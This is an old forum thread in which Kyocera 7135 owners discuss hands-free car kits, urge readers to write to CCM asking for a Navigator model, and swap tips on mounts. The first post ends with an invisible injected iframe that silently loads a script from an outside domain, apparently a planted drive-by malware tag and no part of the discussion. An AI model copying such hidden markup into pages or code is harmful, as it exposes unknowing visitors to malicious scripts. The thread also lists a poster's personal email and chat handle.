+ Reply to Thread

Possible CCM Hands-free kit for 7135

I've written to CCM in the attempt to have them create/distribube a CCM Navigator model for the 7135. If you don't have any idea of what this is please click here . I beleive the CCM Navigator to be the best hands-free kit out there (especially the kind that works in tandum with your FM radio). Hopefully, if enough people start writing to them, they'll see that there is in fact a market for this and get off of their behinds and get to work. The Company really needs to stop making Navigators for the cheap-as$ Star tacs because now there's something just a wee bit better out there. All of their contact info is as follows: CCM
    11330 NW 36th Terrace
    Miami, Florida 33178
    Telephone: 305.406.1656
    Fax: 305.406.2476

You can reach customer service at
    1-800-928-7696 or
    E-mail: ccm@ccmcellular.com

For technical support E-mail: support@ccmcellular.com<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Same feeling here.

I just received my 7135 yesterday, and although it has a decent speaker-phone, a well-designed car kit would be better.

My old phone had the best car kit I've ever seen. The Nokia kit was a permanent install -- no wires to plug into the phone -- just a one-handed snap into the phone cradle. The system provided power, and hands free operation, plus was smart enough to keep the screen light on, and automatically go into hands-free mode.

A CCM kit gets my vote.

Dawn

I used a CCM a few years ago.. very tinny sound not much better than the speakerphone in my opinion, The model I had did not interface with the radio so YMMV. If they have better models now or plan to make one for the 7135.... make sure they use STEREO output to the car radio so you can listen to MP3's or Movies when your not using the phone THEN they'd have my vote.
    iPhone therefore iAm.

I got the Kyocera portable hands free. Its put together rather cleverly for adapting to various cars it seems. The sound is great (esp. compared to my 3035 professionally installed kit -- could be the RF ambiance of the old car) but I didn't reckon on having to deal with phone buttons when the phone is not secured, esp. the low profile, slick buttons in the unbalanced headset of the 7135. For dialing, this is less of an issue, just program voice dial for most contacts and simply find the 'dial' button. For answering, at least indiscriminately, you don't have to touch a button at all. For using the voice mail system, this remains a problem.

So, I'd really like to find a solution where I can secure the phone --open-- where I can glance at it. I see these Navigator will secure other phones, but while we're waiting for them to come out with a 7135 product, has anyone come up with an accessory mount for 7135 in the open position?

Originally posted by DestructorOfTi
    I got the Kyocera portable hands free. Its put together rather cleverly for adapting to various cars it seems. The sound is great (esp. compared to my 3035 professionally installed kit -- could be the RF ambiance of the old car) but I didn't reckon on having to deal with phone buttons when the phone is not secured, esp. the low profile, slick buttons in the unbalanced headset of the 7135. For dialing, this is less of an issue, just program voice dial for most contacts and simply find the 'dial' button. For answering, at least indiscriminately, you don't have to touch a button at all. For using the voice mail system, this remains a problem.

So, I'd really like to find a solution where I can secure the phone --open-- where I can glance at it. I see these Navigator will secure other phones, but while we're waiting for them to come out with a 7135 product, has anyone come up with an accessory mount for 7135 in the open position?
    Do a search on car kit, car mount, ect. Some SPS members have used the belt clip as a temporary phone mount until someone comes out with something...and it seems to look like it works.

I have purchased an additional holster and plan to do the same once I figure out where in the car I plan to put the phone.

I recently got the Kyocera HF car kit and am figuring that out first. Some users here have even modified the HFK to become more of a permanent thing.

Oh hell....here is the thread....

http://www.smartphonesource.com/vbul...&threadid=5857

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft